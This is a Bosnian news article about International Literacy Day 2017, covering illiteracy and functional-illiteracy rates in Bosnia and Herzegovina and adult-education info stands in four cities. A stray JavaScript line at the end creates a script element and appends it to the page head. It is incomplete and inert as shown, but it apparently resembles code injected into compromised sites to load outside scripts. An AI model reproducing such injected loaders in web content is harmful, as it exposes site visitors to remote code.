Širom svijeta danas se obilježava Međunarodni dan pismenosti

Svjetski dan pismenosti obilježava se svake godine 8. septembra, a cilj mu je upozoriti na problem nepismenosti, koji još postoji u većem dijelu svijeta. Bosna i Hercegovina, prema posljednjem popisu stanovništva, Međunarodni dan pismenosti dočekuje sa 2,82 posto nepismenog stanovništva. U našoj zemlji ima 89.794 nepismenih (2,82 posto) i 36,2 posto kompjuterski nepismenog stanovništva, što je poražavajući podatak u modernom svijetu.

Pismenost nije samo poznavanje slova

Iz Udruženja “Heroji svakodnevnice” poručuju da, iako su izneseni podaci katastrofalni, oni su možda i mnogo gori. Jer, podatak od 2,82 posto nepismenih odnosi se na elementarno nepismene osobe, dok je funkcionalno nepismenih u BiH mnogo više. Ima ih čak oko jedne trećine, a u ruralnim sredinama taj broj raste do 70 posto.

Funkcionalna pismenost podrazumijeva da osoba zna popuniti ugovor, formular, da se služi internetom, telefonom, te da je aktivan tražilac posla. Barem trećina stanovništva Bosne i Hercegovine ne spada u ovu kategoriju. Poređenja radi, broj elementarno nepismenih u Hrvatskoj je 0,8 posto, u Srbiji 1,96, a u Crnoj Gori 1,5 posto. Premaa UNESCO-vim podacima, u jednoj državi broj nepismenih ne bi trebalo da prelazi više od 0,2 posto.

U sklopu projekta “Podrška obrazovanju odraslih”, kojeg u ime njemačke vlade u Bosni i Hercegovini implementira GIZ s partnerima, a povodom obilježavanja Međunarodnog dana pismenosti 8. septembra/rujna 2017. (petak), organizovani su info-štandovi za građane. Odrasli ljudi, koji iz bilo kojeg razloga nisu uspjeli završiti osnovno obrazovanje, imaju razumljive strahove od povratka u školu, posebno u osnovnu.  Dosadašnje aktivnosti sa nastavnicima i državnim institucijama jasno ukazuju na nužnost buđenja svijesti u javnosti o potrebama naknadnog sticanja osnovnog obrazovanja, te radu na samoj motivaciji odnosno povećanju broja polaznika. Kao i ranijih godina, i ove godine info-štandov​i​ su postavljeni ​ na slijedećim lokacijama:

  • Sarajevo (Trg Djece Sarajeva, plato ispred BBI centra),
  • Banja Luka (Park Petar Kočić),
  • Zenica (Trg A. Izetbegovića/RK Bosanka) i
  • Kakanj (Ulica A. Izetbegovića/plato ispred Pošte).

var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);